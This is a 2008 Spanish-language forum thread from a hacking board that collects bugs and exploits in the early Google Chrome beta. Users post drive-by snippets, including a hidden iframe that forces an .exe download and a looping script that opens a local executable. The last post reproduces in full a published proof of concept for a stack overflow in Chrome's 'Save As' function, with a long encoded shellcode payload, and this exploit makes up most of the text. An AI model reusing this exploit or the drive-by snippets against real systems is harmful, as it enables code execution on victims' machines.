elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [°] Recopilatorio de Bugs/Exploits en Google Chrome win32		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32  (Leído 51,935 veces)
Micah Genji

Desconectado Desconectado

Mensajes: 52


learn more to life


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #20 en: 5 Septiembre 2008, 05:11 am »
Vaya solo pense dar una vuelta por el foro para ver que opinaban sobre el nuevo explorador y a la vez lo rapido que se pudo encontrar bugs, si siguen asi en una semana quien sabe cuantos bugs vayan :)
En línea
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former : A.E
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #21 en: 5 Septiembre 2008, 05:38 am »
A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este  :-X :-\

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo.



pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P
« Última modificación: 5 Septiembre 2008, 05:40 am por Litlehorse » En línea
An expert is a man who has made all the mistakes which can be made, in a very narrow field.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #22 en: 5 Septiembre 2008, 05:47 am »
Citar
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citar
about:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.

El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365


Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
« Última modificación: 5 Septiembre 2008, 07:41 am por WHK » En línea
- https://yhojann.cl/ - https://whk.cl/
hackeen

Desconectado Desconectado

Mensajes: 10


=Hackeen=


Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #23 en: 5 Septiembre 2008, 07:50 am »

 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D



Código:
<html>
<script>
function down(){
document.write('<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" frameborder="0" width="0" height="0"></iframe>');
}
setInterval("down()",200)
</script>

 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D
En línea
=BHT=
Trancek

Desconectado Desconectado

Mensajes: 29


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #24 en: 5 Septiembre 2008, 17:16 pm »
Y otro mas que hace uso de la funcion SaveAs, vamos que tienes que guardar la pagina en tu pc, y poca gente hace eso yo creo...

http://security.bkis.vn/

---
We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator)

http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
En línea
http://www.p1mp4m.es
http://www.trancek.es
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #25 en: 5 Septiembre 2008, 19:28 pm »
Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC



-berz3k.

En línea
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #26 en: 6 Septiembre 2008, 00:31 am »
Por ahí escuché que Google Chrome no soporta RSS  :(

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss
En línea
- https://yhojann.cl/ - https://whk.cl/
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #27 en: 6 Septiembre 2008, 01:26 am »
desbordamiento de la memoria y la ejecución arbitraria de código..

Código
  3. <!--
  4. This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.
  5.  
  6. Here comes details :
  7.  
  8. We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this. 
  9.  
  10. The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems.
  11.  
  12. To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
  13.  
  14. Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
  15.  
  16. Discoverer : Le Duc Anh - SVRT - Bkis
  17. SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems… 
  18.  
  19. Website : http://security.bkis.vn
  20. Mail : svrt[at]bkav.com.vn
  21. -->
  22.  
  24. &#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#37008;&#60166;&#2827;)&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#51505;&#59779;&#9332;&#23540;&#29569;&#60435;&#13869;&#33630;&#64747;&#62690;&#50448;&#24178;&#11756;&#7101;&#42704;&#23370;&#11412;&#54745;&#13731;&#445;&#11468;&#6109;&#6503;&#24509;&#7170;&#51190;&#43328;&#10998;&#60651;&#21500;&#61421;&#43741;&#31191;&#23058;&#51353;&#445;&#11464;&#14557;&#8551;&#54653;&#12723;&#46391;&#12647;&#24509;&#41991;&#31338;&#61160;&#40455;&#42632;&#28278;&#60777;&#21070;&#28007;&#54586;&#12700;&#54683;&#9604;&#22493;&#44391;&#24198;&#11756;&#14013;&#29392;&#43015;&#31628;&#42687;&#60783;&#3661;&#23228;